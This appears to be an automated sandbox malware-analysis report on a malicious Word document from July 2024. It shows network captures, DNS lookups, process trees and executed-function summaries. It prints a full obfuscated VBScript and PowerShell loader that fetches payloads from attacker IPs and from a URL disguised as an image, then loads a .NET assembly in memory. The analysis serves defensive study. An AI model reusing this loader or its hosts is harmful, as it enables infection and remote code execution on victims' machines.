Jul 3, 2024 11:08:42.548866987 CEST	49162	80	192.168.2.22	91.92.254.29
Jul 3, 2024 11:08:42.553628922 CEST	80	49162	91.92.254.29	192.168.2.22
Jul 3, 2024 11:08:43.098459959 CEST	49161	80	192.168.2.22	23.95.235.16
Jul 3, 2024 11:08:43.238446951 CEST	80	49162	91.92.254.29	192.168.2.22
Jul 3, 2024 11:08:43.238492012 CEST	80	49162	91.92.254.29	192.168.2.22
Jul 3, 2024 11:08:43.238507032 CEST	80	49162	91.92.254.29	192.168.2.22
Jul 3, 2024 11:08:43.238575935 CEST	49162	80	192.168.2.22	91.92.254.29
Jul 3, 2024 11:08:46.218270063 CEST	49163	443	192.168.2.22	188.114.96.3
Jul 3, 2024 11:08:46.218317032 CEST	443	49163	188.114.96.3	192.168.2.22
Jul 3, 2024 11:08:46.218385935 CEST	49163	443	192.168.2.22	188.114.96.3
Jul 3, 2024 11:08:46.223527908 CEST	49163	443	192.168.2.22	188.114.96.3
Jul 3, 2024 11:08:46.223547935 CEST	443	49163	188.114.96.3	192.168.2.22
Jul 3, 2024 11:08:46.687376022 CEST	443	49163	188.114.96.3	192.168.2.22
Jul 3, 2024 11:08:46.687441111 CEST	49163	443	192.168.2.22	188.114.96.3
Jul 3, 2024 11:08:46.692166090 CEST	49163	443	192.168.2.22	188.114.96.3
Jul 3, 2024 11:08:46.692176104 CEST	443	49163	188.114.96.3	192.168.2.22
Jul 3, 2024 11:08:46.692527056 CEST	443	49163	188.114.96.3	192.168.2.22
Jul 3, 2024 11:08:46.751250029 CEST	49163	443	192.168.2.22	188.114.96.3
Jul 3, 2024 11:08:46.796500921 CEST	443	49163	188.114.96.3	192.168.2.22
Jul 3, 2024 11:08:46.854789019 CEST	443	49163	188.114.96.3	192.168.2.22
Jul 3, 2024 11:08:46.854831934 CEST	443	49163	188.114.96.3	192.168.2.22
Jul 3, 2024 11:08:46.854857922 CEST	443	49163	188.114.96.3	192.168.2.22
Jul 3, 2024 11:08:46.854902983 CEST	49163	443	192.168.2.22	188.114.96.3
Jul 3, 2024 11:08:46.854921103 CEST	443	49163	188.114.96.3	192.168.2.22
Jul 3, 2024 11:08:46.859340906 CEST	443	49163	188.114.96.3	192.168.2.22
Jul 3, 2024 11:08:46.859395027 CEST	49163	443	192.168.2.22	188.114.96.3
Jul 3, 2024 11:08:46.860848904 CEST	49163	443	192.168.2.22	188.114.96.3
Jul 3, 2024 11:08:48.655133009 CEST	80	49162	91.92.254.29	192.168.2.22
Jul 3, 2024 11:08:48.655195951 CEST	49162	80	192.168.2.22	91.92.254.29
Jul 3, 2024 11:08:48.655332088 CEST	49162	80	192.168.2.22	91.92.254.29
Jul 3, 2024 11:08:48.663918018 CEST	80	49162	91.92.254.29	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 11:08:45.996385098 CEST	54562	53	192.168.2.22	8.8.8.8
Jul 3, 2024 11:08:46.208631039 CEST	53	54562	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 3, 2024 11:08:45.996385098 CEST	192.168.2.22	8.8.8.8	0x8f7a	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 3, 2024 11:08:46.208631039 CEST	8.8.8.8	192.168.2.22	0x8f7a	No error (0)	uploaddeimagens.com.br		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 3, 2024 11:08:46.208631039 CEST	8.8.8.8	192.168.2.22	0x8f7a	No error (0)	uploaddeimagens.com.br		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

uploaddeimagens.com.br

23.95.235.16

91.92.254.29

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	23.95.235.16	80	2436	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 11:08:41.739130020 CEST	330	OUT	GET /33011/greatideaforfollowers.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 23.95.235.16 Connection: Keep-Alive
Jul 3, 2024 11:08:42.209574938 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 09:08:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Wed, 03 Jul 2024 07:43:29 GMT ETag: "da2-61c52fc81f10f" Accept-Ranges: bytes Content-Length: 3490 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-gzip Data Raw: ff fe 44 00 69 00 6d 00 20 00 69 00 4c 00 47 00 4c 00 70 00 5a 00 4c 00 51 00 47 00 4b 00 4a 00 4e 00 63 00 62 00 4b 00 50 00 63 00 71 00 5a 00 4e 00 50 00 63 00 6b 00 4e 00 47 00 4b 00 4e 00 50 00 75 00 6e 00 4b 00 4e 00 61 00 63 00 76 00 4b 00 5a 00 4b 00 6e 00 64 00 47 00 4c 00 5a 00 4b 00 61 00 57 00 57 00 43 00 4c 00 66 00 6b 00 6c 00 50 00 63 00 6d 00 62 00 6e 00 61 00 4c 00 57 00 68 00 4e 00 49 00 5a 00 61 00 51 00 63 00 74 00 6b 00 4a 00 57 00 47 00 42 00 63 00 64 00 6c 00 55 00 69 00 5a 00 57 00 41 00 68 00 78 00 4c 00 51 00 64 00 4b 00 6c 00 52 00 42 00 41 00 69 00 4c 00 66 00 4a 00 4b 00 4b 00 51 00 63 00 57 00 2c 00 20 00 52 00 76 00 67 00 6f 00 7a 00 43 00 4e 00 4c 00 42 00 55 00 4f 00 4c 00 41 00 6c 00 47 00 57 00 64 00 65 00 4c 00 70 00 75 00 47 00 70 00 57 00 71 00 72 00 50 00 42 00 63 00 63 00 75 00 69 00 74 00 62 00 47 00 57 00 66 00 57 00 6b 00 52 00 75 00 55 00 7a 00 4b 00 4f 00 78 00 78 00 52 00 69 00 6f 00 55 00 4b 00 57 00 61 00 4c 00 42 00 57 00 70 00 53 00 55 00 76 00 42 00 [TRUNCATED] Data Ascii: Dim iLGLpZLQGKJNcbKPcqZNPckNGKNPunKNacvKZKndGLZKaWWCLfklPcmbnaLWhNIZaQctkJWGBcdlUiZWAhxLQdKlRBAiLfJKKQcW, RvgozCNLBUOLAlGWdeLpuGpWqrPBccuitbGWfWkRuUzKOxxRioUKWaLBWpSUvBTcSqnbfZoWbpPkZdNqLjcLZGaiGGaWriGedAziSet iLGLpZLQGKJNcbKPcqZNPckNGKNPunKNacvKZKndGLZKaWWCLfklPcmbnaLWhNIZaQctkJWGBcdlUiZWAhxLQdKlRBAiLfJKKQcW = CreateObject("MSXML2.ServerXMLHTTP")iLGLpZLQGKJNcbKPcqZNPckNGKNPunKNacvKZKndGLZKaWWCLfklPcmbnaLWhNIZaQctkJWGBcdlUiZWAhxLQdKlRBAiLfJKKQcW.Open
Jul 3, 2024 11:08:42.209592104 CEST	224	IN	Data Raw: 00 20 00 22 00 47 00 45 00 54 00 22 00 2c 00 20 00 22 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 39 00 31 00 2e 00 39 00 32 00 2e 00 32 00 35 00 34 00 2e 00 32 00 39 00 2f 00 55 00 73 00 65 00 72 00 73 00 5f 00 41 00 50 00 49 00 2f 00 73 00 79 Data Ascii: "GET", "http://91.92.254.29/Users_API/syscore/file_xgep41gp.dyp.txt", FalseiLGLpZLQGKJNcbKPcqZNPckNGKNPunKNac
Jul 3, 2024 11:08:42.209610939 CEST	1236	IN	Data Raw: 00 76 00 4b 00 5a 00 4b 00 6e 00 64 00 47 00 4c 00 5a 00 4b 00 61 00 57 00 57 00 43 00 4c 00 66 00 6b 00 6c 00 50 00 63 00 6d 00 62 00 6e 00 61 00 4c 00 57 00 68 00 4e 00 49 00 5a 00 61 00 51 00 63 00 74 00 6b 00 4a 00 57 00 47 00 42 00 63 00 64 Data Ascii: vKZKndGLZKaWWCLfklPcmbnaLWhNIZaQctkJWGBcdlUiZWAhxLQdKlRBAiLfJKKQcW.SendIf iLGLpZLQGKJNcbKPcqZNPckNGKNPunKNacvKZKndGLZKa
Jul 3, 2024 11:08:42.209621906 CEST	1113	IN	Data Raw: 00 6b 00 70 00 78 00 47 00 61 00 6b 00 68 00 72 00 47 00 63 00 61 00 55 00 4c 00 63 00 68 00 71 00 43 00 4b 00 20 00 3d 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 4f 00 62 00 6a 00 65 00 63 00 74 00 28 00 22 00 57 00 53 00 63 00 72 00 69 00 70 Data Ascii: kpxGakhrGcaULchqCK = CreateObject("WScript.Shell") KWxacKaockHfcWSKleKGcNepvPjbGziSGZLhlmkLdivcGWaPNkWmNbLLULixKkdWp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49162	91.92.254.29	80	3140	C:\Windows\SysWOW64\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 11:08:42.548866987 CEST	209	OUT	GET /Users_API/syscore/file_xgep41gp.dyp.txt HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 91.92.254.29
Jul 3, 2024 11:08:43.238446951 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 09:08:43 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Wed, 03 Jul 2024 07:43:29 GMT ETag: "584-61c52fc8141e5" Accept-Ranges: bytes Content-Length: 1412 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: ef bb bf 2e 20 28 20 24 56 45 72 62 6f 53 65 50 72 65 46 45 72 45 6e 63 65 2e 54 6f 73 54 52 69 6e 67 28 29 5b 31 2c 33 5d 2b 27 58 27 2d 4a 6f 69 4e 27 27 29 28 20 28 28 27 39 34 59 6c 69 6e 6b 20 3d 20 59 4b 6f 68 74 74 70 73 3a 2f 2f 75 70 6c 6f 61 64 64 65 69 6d 61 67 65 6e 73 2e 63 6f 6d 2e 62 72 2f 69 6d 61 67 65 73 2f 27 2b 27 30 30 34 2f 38 30 37 2f 30 35 33 2f 6f 72 69 67 69 6e 61 27 2b 27 6c 2f 6e 65 77 5f 69 6d 61 67 65 2e 27 2b 27 6a 70 67 3f 31 37 31 39 38 34 36 32 33 35 59 4b 6f 3b 20 39 34 59 77 65 62 43 6c 69 65 6e 74 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 27 2b 27 6e 74 3b 20 74 72 79 20 7b 20 39 34 59 64 6f 77 6e 6c 6f 61 64 65 64 44 61 74 61 20 3d 20 39 34 59 77 65 62 43 6c 69 65 6e 74 2e 44 6f 77 6e 6c 6f 61 64 44 61 74 61 28 39 34 59 6c 69 6e 6b 29 20 7d 20 63 61 74 63 68 20 7b 20 57 72 69 74 65 2d 48 6f 73 74 20 59 4b 6f 46 61 69 6c 65 64 20 54 6f 20 64 6f 77 6e 6c 6f 61 64 20 64 61 74 61 20 66 72 6f 6d 20 39 34 59 6c 69 [TRUNCATED] Data Ascii: . ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'B
Jul 3, 2024 11:08:43.238492012 CEST	487	IN	Data Raw: 79 74 65 73 20 3d 20 5b 53 79 27 2b 27 73 74 27 2b 27 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 27 2b 27 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 39 34 59 62 61 73 65 36 34 43 6f 6d 6d 61 6e 64 29 3b 20 39 34 59 6c 6f 61 64 65 64 41 73 73 Data Ascii: ytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo
Jul 3, 2024 11:08:43.238507032 CEST	487	IN	Data Raw: 79 74 65 73 20 3d 20 5b 53 79 27 2b 27 73 74 27 2b 27 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 27 2b 27 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 39 34 59 62 61 73 65 36 34 43 6f 6d 6d 61 6e 64 29 3b 20 39 34 59 6c 6f 61 64 65 64 41 73 73 Data Ascii: ytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	188.114.96.3	443	3200	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 09:08:46 UTC	124	OUT	GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-07-03 09:08:46 UTC	587	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 09:08:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=812CT7Mlh7uemSEQ3xNxaq6Bsjl5ameX5m2zBlXa%2BL0%2FWtgv1fhHfuYHdjHK3MUtDteADZ9Y%2BOLmv9IvQSjA3HfxG7AGkNaTpEYojdf%2BAU19vvH91GlFezghBNAmnEjj%2B9098nyudZCw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d5bba08feb8c8a-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 09:08:46 UTC	782	IN	Data Raw: 31 31 35 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 115e<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-07-03 09:08:46 UTC	1369	IN	Data Raw: 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b Data Ascii: tyles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cook
2024-07-03 09:08:46 UTC	1369	IN	Data Raw: 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 4f 50 52 63 78 71 74 5a 53 65 56 31 6d 61 48 4a 52 69 5f 7a 5a 5a 4c 73 6a 66 4c 47 77 66 50 63 30 47 4e 52 6c 43 57 57 56 76 67 2d 31 37 31 39 39 39 37 37 32 36 2d 30 2e 30 2e 31 2e 31 2d 2f 69 6d 61 67 65 73 2f 30 30 34 2f 38 30 37 2f 30 35 33 2f 6f 72 69 67 69 6e 61 6c 2f 6e 65 77 5f 69 6d 61 67 65 2e 6a 70 67 3f 31 37 31 39 38 34 36 32 33 35 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 Data Ascii: hod="GET" enctype="text/plain"> <input type="hidden" name="atok" value="OPRcxqtZSeV1maHJRi_zZZLsjfLGwfPc0GNRlCWWVvg-1719997726-0.0.1.1-/images/004/807/053/original/new_image.jpg?1719846235"> <a href="http
2024-07-03 09:08:46 UTC	934	IN	Data Raw: 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a Data Ascii: hidden" id="cf-footer-ip">8.46.123.33</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https:
2024-07-03 09:08:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	05:08:37
Start date:	03/07/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f030000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	05:08:38
Start date:	03/07/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:08:41
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"
Imagebase:	0x90000
File size:	141'824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:08:42
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
Imagebase:	0x1010000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:09:00
Start date:	03/07/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	58.7%
Total number of Nodes:	46
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 03510668 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03510600,?,00000000,00000000), ref: 0351066A

Part of subcall function 03510681: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035106A8
Part of subcall function 03510681: ExitProcess.KERNEL32(00000000), ref: 035106C0

Memory Dump Source

Source File: 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3510000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction ID: 0843e7daa6e334d2e1a82b20eb105b924141c8c27679f5987c788f775e36cce0
Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction Fuzzy Hash: 40F02791A5C34029F621F7742C9EF6A6F28BFC1700F15088AF1465F0F3D8D488A086AA

Function 03510696 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035106A8

Part of subcall function 035106BB: ExitProcess.KERNEL32(00000000), ref: 035106C0

Memory Dump Source

Source File: 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3510000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: 820a35b4951386dc3fc84271ca26cfc9ed955ec953492998b8e6bae5139b01e0
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: 78014E5BA5430220F730F2286C55BBAB750FB81740FCC4846E9820B0F5D4A890E38E59

Function 03510681 Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3510000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction ID: bf2fe5566722aae169b804834ea470f7359f1805dc112ec0e2307c44124d4645
Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction Fuzzy Hash: 35014E2795830520F770E3246C88BAEBB90FBC1744F544456F5520B0F5D6A444E2CA5D

Function 035105D5 Relevance: 1.6, APIs: 1, Instructions: 57
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(035105C7), ref: 035105D5

Memory Dump Source

Source File: 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3510000_EQNEDT32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
